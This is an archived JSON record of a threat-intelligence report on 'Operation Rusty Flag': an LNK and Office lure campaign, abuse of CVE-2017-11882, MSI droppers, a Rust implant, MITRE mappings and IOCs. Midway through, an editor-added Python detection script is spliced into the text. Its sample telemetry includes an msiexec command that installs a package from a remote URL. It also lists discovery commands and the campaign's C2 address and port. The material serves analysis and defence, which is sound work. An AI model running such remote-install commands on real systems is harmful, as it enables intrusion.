{
	"id": "11a79ab4-06ec-4914-a4ad-717dabc5fb9b",
	"created_at": "2026-04-06T00:16:54.892448Z",
	"updated_at": "2026-04-10T03:26:31.614269Z",
	"deleted_at": null,
	"sha1_hash": "2d2de14269b82ecb481eb6086b59b6e02d8539ea",
	"title": "Operation Rusty Flag – A Malicious Campaign Against Azerbaijanian Targets | Deep Instinct",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2274220,
	"plain_text": "Operation Rusty Flag – A Malicious Campaign Against\r\nAzerbaijanian Targets | Deep Instinct\r\nBy Simon KeninThreat Intelligence Researcher\r\nPublished: 2023-09-14 · Archived: 2026-04-05 13:10:13 UTC\r\nKey takeaways:\r\nThe Deep Instinct Threat Lab has discovered a new operation against Azerbaijanian targets\r\nThe operation has at least two different initial access vectors\r\nThe operation is not associated with a known threat actor; the operation was instead named because of their\r\nnovel malware written in the Rust programming language\r\nOne of the lures used in the operation is a modified document that was used by the Storm-0978 group. This\r\ncould be a deliberate “false flag”\r\nFigure 1: Attack Flow\r\nLNK Vector:\r\nDeep Instinct Threat Lab observed a malicious LNK file with low detections named “1.KARABAKH.jpg.lnk.”\r\nThe file has a double extension to lure the victim to click an image that is related to a military incident in\r\nNagorno-Karabakh.\r\nThe LNK downloads and executes an MSI installer hosted by DropBox:\r\nhttps://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets\r\nPage 1 of 13\n\nFig 2: LNK arguments\r\nFig 3: OSINT information about MSI uploader from Dropbox\r\nThe MSI file drops an implant written in Rust, an xml file for a scheduled task to execute the implant, and a decoy\r\nimage file:\r\nFigure 4: Decoy image file\r\nThe image file includes watermarks of the symbol of the Azerbaijanian MOD.\r\nOffice False Flag Vector:\r\nOnce we identified the LNK campaign the Deep Instinct Threat Lab attempted to identify additional, related files.\r\nDeep Instinct Threat Lab quickly found another MSI file hosted on DropBox that drops a different variant of the\r\nsame Rust implant; however, the identification of the initial access vector for this campaign was trickier.\r\nThe DropBox URL was masked with a URL shortener (hxxps://t[.]]ly/8CYQW) and the evidence showed that 
this URL was invoked via exploitation of Microsoft Equation Editor CVE-2017-11882.\r\nDeep Instinct Threat Lab identified a file named “Overview_of_UWCs_UkraineInNATO_campaign.docx” that was invoking the request to this shortened URL; however, this filename and its content are known to be associated with a Storm-0978 campaign utilizing CVE-2023-36884.\r\nThe identified file even carried a comment on VirusTotal saying it is related to the Storm-0978 campaign:\r\nFigure 5: VT comment\r\nAfter further investigation it was revealed that this is a different file, not related to the Storm-0978 campaign. The embedded “afchunk.rtf” file has been replaced and CVE-2023-36884 is not used. Instead, CVE-2017-11882 is used to download and install the MSI file.\r\nThis looks like a deliberate false flag attempt to pin the attack on Storm-0978.\r\nFig 6: OSINT information about the MSI uploader for the Office vector\r\nEven though the initial lure is an Office file, the delivered MSI file also opens a decoy file, this time a PDF invoice:\r\nFig 7: PDF decoy dropped by the Office vector\r\nMSI Analysis:\r\nWhile the initial vectors are different, the execution stage is the same: msiexec is invoked with a URL pointing to Dropbox.\r\nThe Linux file command or msitools shows that the MSI files were created with “MSI Wrapper” (https://www.exemsi.com/), a legitimate packaging tool that threat actors often use to wrap malicious files.\r\nThe MSI installers drop and execute the Rust implant along with a decoy file and an XML file for the scheduled task.\r\nFigure 8: MSI Metadata\r\nRust Implant Analysis:\r\nEach attack had 
its unique file names and metadata. One of the Rust implants, named “WinDefenderHealth.exe”, is expected to gather information about the host and send it to the attacker server, which was still active at the time of this research.\r\nFigure 9: Metadata of the Rust malware\r\nFigure 10: Rust compiler\r\nRust is becoming more popular among malware authors. Security products are not yet detecting Rust malware accurately, and the reverse engineering process is more complex. Tools like IDA and Ghidra do not recognize the Rust standard library, so large portions of the code are tagged as unknown and it is difficult to separate standard-library code from the malware's own code. To overcome this, the GhidRust plugin was used, but it did not detect the standard library functions. BinDiff was also tried: a simple Rust binary was compiled and compared against the malware, but very little code was shared. Some open-source Rust projects were identified in the malware, such as Tokio (a runtime for writing reliable, asynchronous, and slim applications in Rust), hyper (a fast and correct HTTP implementation for Rust) and Serde JSON (a framework for serializing and deserializing Rust data structures efficiently and generically). After that, we moved on to dynamic analysis.\r\nOnce executed, the file sleeps for 12 minutes. 
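Every stage described in this report leaves a footprint in ordinary endpoint telemetry: msiexec invoked with a Dropbox URL (MSI Analysis above), a process that sits idle for twelve minutes before doing anything, a burst of discovery tools spawned by one parent, and an outbound connection to the hardcoded port 35667 (both described in the dynamic-analysis section that follows). The script below is an added example written for this page, not code from the report or from Deep Instinct. It runs four detectors over constructed Sysmon-style process-creation and network-connection events and correlates the hits per process. The event format, process IDs, timestamps and file locations are made up; only the destination address and port are taken from the report's IOC list, and the T1218.007 label for msiexec proxy execution is the editor's own ATT&CK mapping, not one the report provides. Images are recorded as basenames only.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry (not from the report). One event per line,
# fields separated by a pipe:
#   proc events: time|proc|pid|ppid|image|command line
#   net  events: time|net|pid|-|image|destination ip:port
# PIDs, times and names are invented; 78.135.73.140:35667 is the report's IOC.
SAMPLE_EVENTS = '''
2023-09-01T09:00:00|proc|4100|2200|explorer.exe|explorer.exe
2023-09-01T09:00:05|proc|4120|4100|cmd.exe|cmd.exe /c start msiexec /i https://www.dropbox.com/s/example/x.msi /qn
2023-09-01T09:00:06|proc|4140|4120|msiexec.exe|msiexec /i https://www.dropbox.com/s/example/x.msi /qn
2023-09-01T09:00:09|proc|4160|4140|WinDefenderHealth.exe|WinDefenderHealth.exe
2023-09-01T09:00:10|proc|4170|4140|schtasks.exe|schtasks /create /xml task.xml /tn WinDefenderHealth
2023-09-01T09:12:11|proc|4200|4160|systeminfo.exe|systeminfo
2023-09-01T09:12:12|proc|4201|4160|ipconfig.exe|ipconfig /all
2023-09-01T09:12:12|proc|4202|4160|whoami.exe|whoami /all
2023-09-01T09:12:13|proc|4203|4160|net.exe|net user
2023-09-01T09:12:14|proc|4204|4160|tasklist.exe|tasklist /v
2023-09-01T09:12:20|net|4160|-|WinDefenderHealth.exe|78.135.73.140:35667
2023-09-01T09:30:00|proc|5000|4100|ipconfig.exe|ipconfig /all
'''

# The discovery tools the report lists in its MITRE table.
DISCOVERY_IMAGES = {'systeminfo.exe', 'ipconfig.exe', 'whoami.exe', 'net.exe', 'tasklist.exe'}


def parse_events(text):
    '''Turn the pipe-delimited sample into a list of event dicts.'''
    events = []
    for line in text.strip().splitlines():
        time, kind, pid, ppid, image, details = line.split('|', 5)
        events.append({
            'time': datetime.fromisoformat(time),
            'kind': kind,
            'pid': int(pid),
            'ppid': None if ppid == '-' else int(ppid),
            'image': image.lower(),
            'details': details,
        })
    return events


def detect_remote_msiexec(events):
    '''T1218.007 (editor's mapping): msiexec.exe installing a package straight from a URL.'''
    return [e['pid'] for e in events
            if e['kind'] == 'proc' and e['image'] == 'msiexec.exe'
            and '://' in e['details'].lower()]


def detect_discovery_burst(events, window=timedelta(seconds=60), min_distinct=3):
    '''One parent spawning several distinct discovery tools inside a short window.'''
    by_parent = defaultdict(list)
    for e in events:
        if e['kind'] == 'proc' and e['image'] in DISCOVERY_IMAGES:
            by_parent[e['ppid']].append(e)
    hits = []
    for ppid, children in by_parent.items():
        children.sort(key=lambda e: e['time'])
        for i, first in enumerate(children):
            seen = {c['image'] for c in children[i:] if c['time'] - first['time'] <= window}
            if len(seen) >= min_distinct:
                hits.append(ppid)
                break
    return hits


def detect_c2_port(events, port=35667):
    '''Outbound connection to the uncommon, hardcoded C2 port.'''
    return [e['pid'] for e in events
            if e['kind'] == 'net' and e['details'].rsplit(':', 1)[-1] == str(port)]


def detect_delayed_start(events, min_delay=timedelta(minutes=10)):
    '''Long gap between a process starting and its first child: the sleep-then-act pattern.'''
    started = {e['pid']: e['time'] for e in events if e['kind'] == 'proc'}
    first_child = {}
    for e in sorted(events, key=lambda e: e['time']):
        if e['kind'] == 'proc' and e['ppid'] in started and e['ppid'] not in first_child:
            first_child[e['ppid']] = e['time']
    return [pid for pid, t in first_child.items() if t - started[pid] >= min_delay]


def triage(text):
    '''Return {pid: [labels]} for every process that tripped at least one detector.'''
    events = parse_events(text)
    findings = defaultdict(list)
    for pid in detect_remote_msiexec(events):
        findings[pid].append('remote-msi')
    for pid in detect_discovery_burst(events):
        findings[pid].append('discovery-burst')
    for pid in detect_c2_port(events):
        findings[pid].append('c2-port')
    for pid in detect_delayed_start(events):
        findings[pid].append('delayed-start')
    return dict(findings)


if __name__ == '__main__':
    for pid, labels in sorted(triage(SAMPLE_EVENTS).items()):
        print(pid, ', '.join(labels))
```

Run directly, the script lists the tripped detectors per PID: the msiexec process is flagged for the remote package, and the implant process is flagged three times (discovery burst, C2 port, delayed start) while the lone ipconfig launched from explorer is ignored. The delayed-start detector is the one to calibrate carefully: it fires on any process whose first child appears ten or more minutes after it started, which matches the implant's twelve-minute sleep but will also match long-lived service hosts, so it belongs in a correlation with the other signals rather than as a standalone alert.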
A long initial sleep is a well-known technique for outlasting the time limits of automated sandboxes and slowing down analysts.\r\nFigure 11: “Sleep” for 12 minutes\r\nThen it starts collecting information about the infected machine:\r\nFigure 12: “Collect” information\r\nFigure 13: Processes collecting information about the PC\r\nThe malware then reads the output of the above executions by redirecting their StdOut to a named pipe. It is notable that the StdIn, StdOut, and StdErr values of the spawned processes are handles to those named pipes.\r\nFigure 14: “Read” the collected information\r\nThe information is gathered using the following template:\r\nFigure 15: Sample of the collected info before encryption\r\nThe above information is then encrypted and sent to the attacker server over an uncommon, hardcoded port, 35667:\r\nFigure 16: Encrypted information being sent to the server\r\nWe have built a script, available in our Git, to decrypt the information the malware sends.\r\nAll analyzed files above had a low detection rate on VT at the time of analysis. There were zero detections when first seen, and most of the detections since are generic ones.\r\nFigure 17: Detections of the Rust implant in VT. 
All detections are generic.\r\nWhile the other Rust implant still has zero detections:\r\nFigure 18: 2nd Rust implant VT detections\r\nConclusion:\r\nDeep Instinct Threat Lab could not attribute these attacks to any known threat actor. There is a possibility that these files are part of a red team exercise.\r\nRegardless, the fact that both Rust implants had zero detections when first uploaded to VirusTotal shows that writing malware in esoteric languages can bypass many security solutions.\r\nMITRE:\r\nTactic | Technique | Description | Observable\r\nDiscovery | T1082 System Information Discovery | The malware executes systeminfo.exe to gain information about the infected computer | systeminfo.exe\r\nDiscovery | T1016 System Network Configuration Discovery | Gain detailed information about the network interfaces on the system | ipconfig.exe /all\r\nDiscovery | T1033 System Owner/User Discovery | Gain user, group, and privilege information for the users | whoami.exe /all\r\nDiscovery | T1087 Account Discovery | Gain information about local or domain accounts on a system | net.exe user\r\nDiscovery | T1057 Process Discovery | Gain a list of currently running processes, including detailed information about each one | tasklist.exe /v\r\nPersistence | T1053 Scheduled Task/Job | Create a scheduled task using the XML file | schtasks.exe\r\nCommand and Control | T1132 Data Encoding | Encrypted communication | Encrypted information sent to the C2. 
A tool for decrypting the information is provided in our Git.\r\nIOC:\r\n78.135.73[.]140\r\nSHA256 | Description\r\n463183002d558ec6f4f12475cc81ac2cb8da21549959f587e0fb93bd3353e13e | Archive containing malicious Office file\r\nedc531d255b9ae8ae6902dc676f24e95a478576cad297e08e2bbc0b8fe03e4ce | Malicious Office file\r\n1546bb5bfc25741434148b77fe51fed7618432a232049b3f6f7210e7fb1f3f0e | MSI file from hxxps://t[.]ly/8CYQW\r\n387304b50852736281a29d00ed2d8cdb3368d171215f1099b41c404e7e099193 | SangforUD.EXE Rust implant\r\n0742cd9b92661f23f6b294cc29c814de027b5b64b045e4807fc03123b153bcd5 | Decoy PDF file\r\n04725fb5a9e878d68e03176364f3b1057a5c54cca06ec988013a508d6bb29b42 | Malicious LNK file\r\n35f2f7cd7945f43d9692b6ea39d82c4fc9b86709b18164ad295ce66ac20fd8e5 | MSI file from LNK vector\r\n5327308fee51fc6bb95996c4185c4cfcbac580b747d79363c7cf66505f3ff6db | WinDefenderHealth.EXE Rust implant\r\ne508cafa5c45847ecea35539e836dc9370699d21522839342c3f3573bf550555 | Decoy JPEG file\r\nSource: https://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets"
	],
	"report_names": [
		"operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "555e2cac-931d-4ad4-8eaa-64df6451059d",
			"created_at": "2023-01-06T13:46:39.48103Z",
			"updated_at": "2026-04-10T02:00:03.342729Z",
			"deleted_at": null,
			"main_name": "RomCom",
			"aliases": [
				"UAT-5647",
				"Storm-0978"
			],
			"source_name": "MISPGALAXY:RomCom",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d58052ba-978b-4775-985a-26ed8e64f98c",
			"created_at": "2023-09-07T02:02:48.069895Z",
			"updated_at": "2026-04-10T02:00:04.946879Z",
			"deleted_at": null,
			"main_name": "Tropical Scorpius",
			"aliases": [
				"DEV-0978",
				"RomCom",
				"Storm-0671",
				"Storm-0978",
				"TA829",
				"Tropical Scorpius",
				"UAC-0180",
				"UNC2596",
				"Void Rabisu"
			],
			"source_name": "ETDA:Tropical Scorpius",
			"tools": [
				"COLDDRAW",
				"Cuba",
				"Industrial Spy",
				"PEAPOD",
				"ROMCOM",
				"ROMCOM RAT",
				"SingleCamper",
				"SnipBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d7bf9558-5d45-49d0-8e8b-a263701e32ad",
			"created_at": "2023-10-14T02:03:14.3762Z",
			"updated_at": "2026-04-10T02:00:04.830277Z",
			"deleted_at": null,
			"main_name": "Operation Rusty Flag",
			"aliases": [],
			"source_name": "ETDA:Operation Rusty Flag",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434614,
	"ts_updated_at": 1775791591,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2d2de14269b82ecb481eb6086b59b6e02d8539ea.pdf",
		"text": "https://archive.orkl.eu/2d2de14269b82ecb481eb6086b59b6e02d8539ea.txt",
		"img": "https://archive.orkl.eu/2d2de14269b82ecb481eb6086b59b6e02d8539ea.jpg"
	}
}